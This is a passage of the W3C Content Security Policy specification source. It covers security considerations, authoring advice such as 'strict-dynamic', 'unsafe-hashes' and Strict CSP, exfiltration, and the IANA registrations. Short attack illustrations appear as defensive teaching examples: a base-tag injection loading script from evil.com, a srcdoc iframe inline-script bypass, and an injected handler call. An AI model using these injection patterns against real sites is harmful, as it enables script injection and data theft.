    &lt;script nonce=abc src=/good.js&gt;&lt;/script&gt;
  </pre>

  However, the following will load `https://evil.com/good.js`:

  <pre highlight="html">
    &lt;base href="https://evil.com"&gt;
    &lt;script nonce=abc src=/good.js&gt;&lt;/script&gt;
  </pre>

  To mitigate this risk, it is advisable to set an explicit <{base}> element on every page, or to
  limit the ability of an attacker to inject their own <{base}> element by setting a
  <a>`base-uri`</a> directive in your page's policy. For example, `base-uri 'none'`.

  <h3 id="security-css-parsing">CSS Parsing</h3>

  The <a>style-src</a> directive restricts the locations from which the
  protected resource can load styles. However, if the user agent uses a lax CSS
  parsing algorithm, an attacker might be able to trick the user agent into
  accepting malicious "stylesheets" hosted by an otherwise trustworthy origin.

  These attacks are similar to the CSS cross-origin data leakage attack
  described by Chris Evans in 2009 [[CSS-ABUSE]]. User agents SHOULD defend
  against both attacks using the same mechanism: stricter CSS parsing rules for
  style sheets with improper MIME types.

  <h3 id="security-violation-reports">Violation Reports</h3>

  The violation reporting mechanism in this document has been designed to
  mitigate the risk that a malicious web site could use violation reports to
  probe the behavior of other servers. For example, consider a malicious web
  site that allows `https://example.com` as a source of images. If the
  malicious site attempts to load `https://example.com/login` as an image, and
  the `example.com` server redirects to an identity provider (e.g.
  `identityprovider.example.net`), CSP will block the request. If violation
  reports contained the full blocked URL, the violation report might contain
  sensitive information contained in the redirected URL, such as session
  identifiers or purported identities. For this reason, the user agent includes
  only the URL of the original request, not the redirect target.

  Note also that violation reports should be considered attacker-controlled data. Developers who
  wish to collect violation reports in a dashboard or similar service should be careful to properly
  escape their content before rendering it (and should probably themselves use CSP to further
  mitigate the risk of injection). This is especially true for the "`script-sample`" property of
  violation reports, and the {{SecurityPolicyViolationEvent/sample}} property of
  {{SecurityPolicyViolationEvent}}, which are both completely attacker-controlled strings.

  <h3 id="source-list-paths-and-redirects">Paths and Redirects</h3>

  To avoid leaking path information cross-origin (as discussed
  in Egor Homakov's
  <a href="https://homakov.blogspot.de/2014/01/using-content-security-policy-for-evil.html">Using Content-Security-Policy for Evil</a>),
  the matching algorithm ignores the path component of a source
  expression if the resource being loaded is the result of a
  redirect. For example, given a page with an active policy of
  <code><a>img-src</a> example.com example.org/path</code>:

  *   Directly loading <code>https://example.org/not-path</code>
      would fail, as it doesn't match the policy.

  *   Directly loading <code>https://example.com/redirector</code>
      would pass, as it matches <code>example.com</code>.

  *   Assuming that <code>https://example.com/redirector</code>
      delivered a redirect response pointing to <code>https://example.org/not-path</code>,
      the load would succeed, as the initial URL matches <code>example.com</code>,
      and the redirect target matches <code>example.org/path</code>
      if we ignore its path component.

  This restriction reduces the granularity of a document's policy when redirects are in play, a
  necessary compromise to avoid brute-forced information leaks of this type.

  The relatively long thread
  <a href="https://lists.w3.org/Archives/Public/public-webappsec/2014Feb/0036.html">"Remove paths from CSP?"</a>
  from public-webappsec@w3.org has more detailed discussion around alternate proposals.

  <h3 id="security-secure-upgrades">Secure Upgrades</h3>

  To mitigate one variant of history-scanning attacks like Yan Zhu's
  <a href="http://diracdeltas.github.io/sniffly/">Sniffly</a>, CSP will not allow pages to lock
  themselves into insecure URLs via policies like `script-src http://example.com`. As described in
  [[#match-schemes]], the scheme portion of a source expression will always allow upgrading to a
  secure variant.

  <h3 id="security-inherit-csp">
    CSP Inheriting to avoid bypasses
  </h3>

  Documents loaded from <a>local schemes</a> will inherit a copy of the
  policies in the source document. The goal is to ensure that a page can't
  bypass its policy by embedding a frame or opening a new window containing
  content that is entirely under its control (`srcdoc` documents, `blob:` or `data:`
  URLs, `about:blank` documents that can be manipulated via `document.write()`, etc).

  <div class="example">
    If this would not happen a page could execute inline scripts even without
    `unsafe-inline` in the page's execution context by simply embedding a `srcdoc`
    `iframe`.
    <pre highlight="html">
      &lt;iframe srcdoc="&lt;script&gt;alert(1);&lt;/script&gt;"&gt;&lt;/iframe&gt;
    </pre>
  </div>

  Note that we create a copy of the <a for="global object">CSP list</a> which
  means that the new {{Document}}'s <a for="global object">CSP list</a> is a
  snapshot of the relevant policies at its creation time. Modifications in the
  <a for="global object">CSP list</a> of the new {{Document}} won't affect the
  source {{Document}}'s <a for="global object">CSP list</a> or vice-versa.

  <div class="example">
    In the example below the image inside the iframe will not load because it is
    blocked by the policy in the `meta` tag of the iframe. The image outside the
    iframe will load (assuming the main page policy does not block it) since the
    policy inserted in the iframe will not affect it.
    <pre highlight="html">
      &lt;iframe srcdoc='&lt;meta http-equiv="Content-Security-Policy" content="img-src example.com;"&gt;
                         &lt;img src="not-example.com/image"&gt;'&gt;&lt;/iframe&gt;

      &lt;img src="not-example.com/image"&gt;
    </pre>
  </div>

</section>

<!-- Big text: Authoring -->
<section>
  <h2 id="authoring-considerations">Authoring Considerations</h2>

  <h3 id="multiple-policies">
    The effect of multiple policies
  </h3>

  <em>This section is not normative.</em>

  The above sections note that when multiple policies are present, each must be
  enforced or reported, according to its type. An example will help clarify how
  that ought to work in practice. The behavior of an `XMLHttpRequest`
  might seem unclear given a site that, for whatever reason, delivered the
  following HTTP headers:

  <div class="example">
    <pre>
      <a http-header>Content-Security-Policy</a>: default-src 'self' http://example.com http://example.net;
                               connect-src 'none';
      <a http-header>Content-Security-Policy</a>: connect-src http://example.com/;
                               script-src http://example.com/
    </pre>
  </div>

  Is a connection to example.com allowed or not? The short answer is that the
  connection is not allowed. Enforcing both policies means that a potential
  connection would have to pass through both unscathed. Even though the second
  policy would allow this connection, the first policy contains
  `connect-src 'none'`, so its enforcement blocks the connection. The
  impact is that adding additional policies to the list of policies to enforce
  can <em>only</em> further restrict the capabilities of the protected resource.

  To demonstrate that further, consider a script tag on this page. The first
  policy would lock scripts down to `'self'`, `http://example.com` and
  `http://example.net` via the `default-src` directive. The second, however,
  would only allow script from `http://example.com/`. Script will only load if
  it meets both policy’s criteria: in this case, the only origin that can match
  is `http://example.com`, as both policies allow it.

  <h3 id="strict-dynamic-usage">
    Usage of "`'strict-dynamic'`"
  </h3>

  <em>This section is not normative.</em>

  Host- and path-based policies are tough to get right, especially on sprawling origins like CDNs.
  The <a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22#107-bytes">solutions
  to Cure53's H5SC Minichallenge 3: "Sh*t, it's CSP!"</a> [[H5SC3]] are good examples of the
  kinds of bypasses which such policies can enable, and though CSP is capable of mitigating these
  bypasses via exhaustive declaration of specific resources, those lists end up being brittle,
  awkward, and difficult to implement and maintain.

  The "<a grammar>`'strict-dynamic'`</a>" source expression aims to make Content
  Security Policy simpler to deploy for existing applications who have a high
  degree of confidence in the scripts they load directly, but low confidence in
  their ability to provide a reasonable list of resources to load up front.

  If present in a <a>`script-src`</a> or <a>`default-src`</a> directive, it has
  two main effects:

  1.  <a grammar>host-source</a> and <a grammar>scheme-source</a>
      expressions, as well as the "<a grammar>`'unsafe-inline'`</a>"
      and "<a grammar>`'self'`</a> <a grammar>keyword-source</a>s will be
      ignored when loading script.

      <a grammar>hash-source</a> and <a grammar>nonce-source</a> expressions
      will be honored.

  2.  Script requests which are triggered by non-<a>"parser-inserted"</a>
      <{script}> elements are allowed.

  The first change allows you to deploy "<a grammar>`'strict-dynamic'`</a>" in a
  backwards compatible way, without requiring user-agent sniffing: the policy
  `'unsafe-inline' https: 'nonce-abcdefg' 'strict-dynamic'` will act like
  `'unsafe-inline' https:` in browsers that support CSP1, `https:
  'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV'` in browsers that support CSP2, and
  `'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV' 'strict-dynamic'` in browsers that
  support CSP3.

  The second allows scripts which are given access to the page via nonces or
  hashes to bring in their dependencies without adding them explicitly to the
  page's policy.

  <div class="example">
    Suppose MegaCorp, Inc. deploys the following policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>script-src</a> 'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV' <a grammar>'strict-dynamic'</a>
    </pre>

    And serves the following HTML with that policy active:

    <pre highlight="html">
      ...
      &lt;script src="https://cdn.example.com/script.js" nonce="DhcnhD3khTMePgXwdayK9BsMqXjhguVV" &gt;&lt;/script&gt;
      ...
    </pre>

    This will generate a request for `https://cdn.example.com/script.js`, which
    will not be blocked because of the matching <{htmlsvg-global/nonce}> attribute.

    If `script.js` contains the following code:

    <pre highlight="javascript">
      var s = document.createElement('script');
      s.src = 'https://othercdn.not-example.net/dependency.js';
      document.head.appendChild(s);

      document.write('&lt;scr' + 'ipt src="/sadness.js"&gt;&lt;/scr' + 'ipt&gt;');
    </pre>

    `dependency.js` will load, as the <{script}> element created by
    `createElement()` is not <a>"parser-inserted"</a>.

    `sadness.js` will <em>not</em> load, however, as `document.write()` produces
    <{script}> elements which are <a>"parser-inserted"</a>.
  </div>

  Note: With <a grammar>'strict-dynamic'</a>, scripts created at runtime will be
  allowed to execute. If the location of such a script can be controlled by an
  attacker, the policy will then allow the loading of arbitrary scripts. Developers
  that use <a grammar>'strict-dynamic'</a> in their policy should audit the uses
  of non-parser-inserted APIs and ensure that they are not invoked with potentially
  untrusted data. This includes applications or frameworks that tend to determine
  script locations at runtime.

  <section>
    <h3 id="unsafe-hashes-usage">
      Usage of "`'unsafe-hashes'`"
    </h3>

    <em>This section is not normative.</em>

    Legacy websites and websites with legacy dependencies might find it difficult
    to entirely externalize event handlers. These sites could enable such handlers
    by allowing `'unsafe-inline'`, but that's a big hammer with a lot of
    associated risk (and cannot be used in conjunction with nonces or hashes).

    The "<a grammar>`'unsafe-hashes'`</a>" source expression aims to make
    CSP deployment simpler and safer in these situations by allowing developers
    to enable specific handlers via hashes.

    <div class="example">
      MegaCorp, Inc. can't quite get rid of the following HTML on anything
      resembling a reasonable schedule:

      <pre highlight="html">
        &lt;button id="action" onclick="doSubmit()"&gt;
      </pre>

      Rather than reducing security by specifying "`'unsafe-inline'`", they decide to use
      "`'unsafe-hashes'`" along with a hash source expression corresponding to `doSubmit()`, as follows:

      <pre>
        <a http-header>Content-Security-Policy</a>:  <a>script-src</a> <a grammar>'unsafe-hashes'</a> 'sha256-jzgBGA4UWFFmpOBq0JpdsySukE1FrEN5bUpoK8Z29fY='
      </pre>
    </div>

    The capabilities `'unsafe-hashes'` provides is useful for legacy sites, but should be
    avoided for modern sites. In particular, note that hashes allow a particular script to execute,
    but do not ensure that it executes in the way a developer intends. If an interesting capability
    is exposed as an inline event handler (say `<a onclick="transferAllMyMoney()">Transfer</a>`),
    then that script becomes available for an attacker to inject as
    `<script>transferAllMyMoney()</script>`. Developers should be careful to balance the risk of
    allowing specific scripts to execute against the deployment advantages that allowing inline
    event handlers might provide.
  </section>

  <section>
    <h3 id="external-hash">
      Allowing external JavaScript via hashes
    </h3>

    <em>This section is not normative.</em>

    In [[CSP2]], hash <a>source expressions</a> could only match inlined
    script, but now that Subresource Integrity [[SRI]] is widely deployed,
    we can expand the scope to enable externalized JavaScript as well.

    If multiple sets of integrity metadata are specified for a <{script}>, the
    request will match a policy's <a grammar>hash-source</a>s if and only if
    <em>each</em> item in a <{script}>'s integrity metadata matches the policy.

    Note: The CSP spec specifies that the contents of an inline <{script}> element
    or event handler needs to be encoded using <a>UTF-8 encode</a> before computing
    its hash. [[SRI]] computes the hash on the raw resource that is being
    fetched instead. This means that it is possible for the hash needed to allow
    an inline script block to be different from the hash needed to allow an
    external script even if they have identical contents.

    <div class="example">
      MegaCorp, Inc. wishes to allow two specific scripts on a page in a way
      that ensures that the content matches their expectations. They do so by
      setting the following policy:

      <pre>
        <a http-header>Content-Security-Policy</a>: script-src 'sha256-abc123' 'sha512-321cba'
      </pre>

      In the presence of that policy, the following <{script}> elements would be
      allowed to execute because they contain only integrity metadata that matches
      the policy:

      <pre highlight="html">
        &lt;script integrity="sha256-abc123" ...&gt;&lt;/script&gt;
        &lt;script integrity="sha512-321cba" ...&gt;&lt;/script&gt;
        &lt;script integrity="sha256-abc123 sha512-321cba" ...&gt;&lt;/script&gt;
      </pre>

      While the following <{script}> elements would not execute because they
      contain valid metadata that does not match the policy (even though other
      metadata does match):

      <pre highlight="html">
        &lt;script integrity="<b>sha384-xyz789</b>" ...&gt;&lt;/script&gt;
        &lt;script integrity="<b>sha384-xyz789</b> sha512-321cba" ...&gt;&lt;/script&gt;
        &lt;script integrity="sha256-abc123 <b>sha384-xyz789</b> sha512-321cba" ...&gt;&lt;/script&gt;
      </pre>

      Metadata that is not recognized (either because it's entirely invalid, or
      because it specifies a not-yet-supported hashing algorithm) does not affect
      the behavior described here. That is, the following elements would be
      allowed to execute in the presence of the above policy, as the additional
      metadata is invalid and therefore wouldn't allow a script whose content
      wasn't listed explicitly in the policy to execute:

      <pre highlight="html">
        &lt;script integrity="sha256-abc123 <b>sha1024-abcd</b>" ...&gt;&lt;/script&gt;
        &lt;script integrity="sha512-321cba <b>entirely-invalid</b>" ...&gt;&lt;/script&gt;
        &lt;script integrity="sha256-abc123 <b>not-a-hash-at-all</b> sha512-321cba" ...&gt;&lt;/script&gt;
      </pre>
    </div>
  </section>

  <section>
    <h3 id="strict-csp">
      Strict CSP
    </h3>

    <em>This section is not normative.</em>

    Deployment of an effective CSP against XSS is a challenge (as described in
    <a href="https://dl.acm.org/doi/10.1145/2976749.2978363">CSP Is Dead, Long
    Live CSP!</a> [[LONG-LIVE-CSP]]). However, enforcing the following set of CSP
    directives has been identified as an effective and deployable mitigation
    against XSS.

    1.  <em>script-src</em>: Only use <em>nonce</em> <a grammar>source-expression</a>
        and/or <em>hash</em> <a grammar>source-expression</a> with the
        "<a grammar>'strict-dynamic'</a>" <a grammar>keyword-source</a>.

        Note: While "<a grammar>'strict-dynamic'</a>" allows ease of deployment (as
        described in [[#strict-dynamic-usage]]), it should be avoided when possible.

        Note: For backwards compatibility, it is recommended to specify <em>https:</em>
        <a grammar>scheme-source</a> with "<a grammar>'strict-dynamic'</a>".

    2.  <em>base-uri</em>: Specify a value of either "<a grammar>'self'</a>" or "<a grammar>'none'</a>".

    A CSP that meets the above criteria is called Strict CSP. Further details
    are discussed in [[WEBDEV-STRICTCSP]].

    <div class="example">
      The following are examples of Strict CSP:

      Nonce-based Strict CSP:
      <pre>
        <a http-header>Content-Security-Policy</a>: script-src 'strict-dynamic' 'nonce-{RANDOM}'; base-uri 'self';
      </pre>

      Hash-based Strict CSP:
      <pre>
        <a http-header>Content-Security-Policy</a>: script-src 'strict-dynamic' 'sha256-{HASHED_INLINE_SCRIPT}'; base-uri 'self';
      </pre>
    </div>
  </section>
  <section>
    <h3 id="exfiltration">
      Exfiltration
    </h3>

    <em>This section is not normative.</em>

    Data exfiltration can occur when the contents of the request, such as the URL, contain
    information about the user or page that should be restricted and not shared.

    Content Security Policy can mitigate data exfiltration if used to create allowlists of servers
    with which a page is allowed to communicate. Note that a policy which lacks the <a>default-src</a>
    directive cannot mitigate exfiltration, as there are kinds of requests that are not addressable
    through a more-specific directive (<{link/rel/prefetch}>, for example). [[!HTML]]

    <div class="example">
      In the following example, a policy with draconian restrictions on images, fonts, and scripts
      can still allow data exfiltration via other request types (`fetch()`, <{link/rel/prefetch}>, etc):
      [[!HTML]]

      <pre>
        <a http-header>Content-Security-Policy</a>: img-src 'none'; script-src 'none'; font-src 'none'
      </pre>
      
      Supplementing this policy with `default-src 'none'` would improve the page's robustness
      against this kind of attack.
    </div>

    <div class="example">
      In the following example, the <a>default-src</a> directive appears to protect from
      exfiltration, however the <a>img-src</a> directive relaxes this restriction by using a
      wildcard, which allows data exfiltration to arbitrary endpoints. A policy's exfiltration
      mitigation ability depends upon the least-restrictive directive allowlist:

      <pre>
        <a http-header>Content-Security-Policy</a>: default-src 'none'; img-src *
      </pre>
    </div>
</section>



<section>
  <h2 id="implementation-considerations">Implementation Considerations</h2>

  <h3 id="extensions">Vendor-specific Extensions and Addons</h3>

  <a for="/">Policy</a> enforced on a resource SHOULD NOT interfere with the operation
  of user-agent features like addons, extensions, or bookmarklets. These kinds
  of features generally advance the user's priority over page authors, as
  espoused in [[HTML-DESIGN]].

  Moreover, applying CSP to these kinds of features produces a substantial
  amount of noise in violation reports, significantly reducing their value to
  developers.

  Chrome, for example, excludes the `chrome-extension:` scheme from CSP checks,
  and does some work to ensure that extension-driven injections are allowed,
  regardless of a page's policy.
</section>

<!-- Big Text: IANA -->
<section>
  <h2 id="iana-considerations">IANA Considerations</h2>

  <h3 id="iana-registry">
    Directive Registry
  </h3>

  The Content Security Policy Directive registry should be updated with the
  following directives and references [[!RFC7762]]:

  :   <a>`base-uri`</a>
  ::  This document (see [[#directive-base-uri]])
  :   <a>`child-src`</a>
  ::  This document (see [[#directive-child-src]])
  :   <a>`connect-src`</a>
  ::  This document (see [[#directive-connect-src]])
  :   <a>`default-src`</a>
  ::  This document (see [[#directive-default-src]])
  :   <a>`font-src`</a>
  ::  This document (see [[#directive-font-src]])
  :   <a>`form-action`</a>
  ::  This document (see [[#directive-form-action]])
  :   <a>`frame-ancestors`</a>
  ::  This document (see [[#directive-frame-ancestors]])
  :   <a>`frame-src`</a>
  ::  This document (see [[#directive-frame-src]])
  :   <a>`img-src`</a>
  ::  This document (see [[#directive-img-src]])
  :   <a>`manifest-src`</a>
  ::  This document (see [[#directive-manifest-src]])
  :   <a>`media-src`</a>
  ::  This document (see [[#directive-media-src]])
  :   <a>`object-src`</a>
  ::  This document (see [[#directive-object-src]])
  :   <a>`report-uri`</a>
  ::  This document (see [[#directive-report-uri]])
  :   <a>`report-to`</a>
  ::  This document (see [[#directive-report-to]])
  :   <a>`sandbox`</a>
  ::  This document (see [[#directive-sandbox]])
  :   <a>`script-src`</a>
  ::  This document (see [[#directive-script-src]])
  :   <a>`script-src-attr`</a>
  ::  This document (see [[#directive-script-src-attr]])
  :   <a>`script-src-elem`</a>
  ::  This document (see [[#directive-script-src-elem]])
  :   <a>`style-src`</a>
  ::  This document (see [[#directive-style-src]])
  :   <a>`style-src-attr`</a>
  ::  This document (see [[#directive-style-src-attr]])
  :   <a>`style-src-elem`</a>
  ::  This document (see [[#directive-style-src-elem]])
  :   <a>`worker-src`</a>
  ::  This document (see [[#directive-worker-src]])

  <h3 id="iana-headers">
    Headers
  </h3>

  The permanent message header field registry should be updated
  with the following registrations: [[!RFC3864]]

  <h4 id="iana-csp">Content-Security-Policy</h4>

  <dl>
    <dt>Header field name</dt>
    <dd>Content-Security-Policy</dd>

    <dt>Applicable protocol</dt>
    <dd>http</dd>

    <dt>Status</dt>
    <dd>standard</dd>

    <dt>Author/Change controller</dt>
    <dd>W3C</dd>

    <dt>Specification document</dt>
    <dd>This specification (See [[#csp-header]])</dd>
  </dl>

  <h4 id="iana-cspro">Content-Security-Policy-Report-Only</h4>

  <dl>
    <dt>Header field name</dt>
    <dd>Content-Security-Policy-Report-Only</dd>

    <dt>Applicable protocol</dt>
    <dd>http</dd>

    <dt>Status</dt>
    <dd>standard</dd>

    <dt>Author/Change controller</dt>
    <dd>W3C</dd>

    <dt>Specification document</dt>
    <dd>This specification (See [[#cspro-header]])</dd>
  </dl>
</section>

<section>
  <h2 id="acknowledgements">Acknowledgements</h2>

  Lots of people are awesome. For instance:

  * Mario and all of Cure53.

  * Artur Janc, Michele Spagnuolo, Lukas Weichselbaum, Jochen Eisinger, and the
    rest of Google's CSP Cabal.
</section>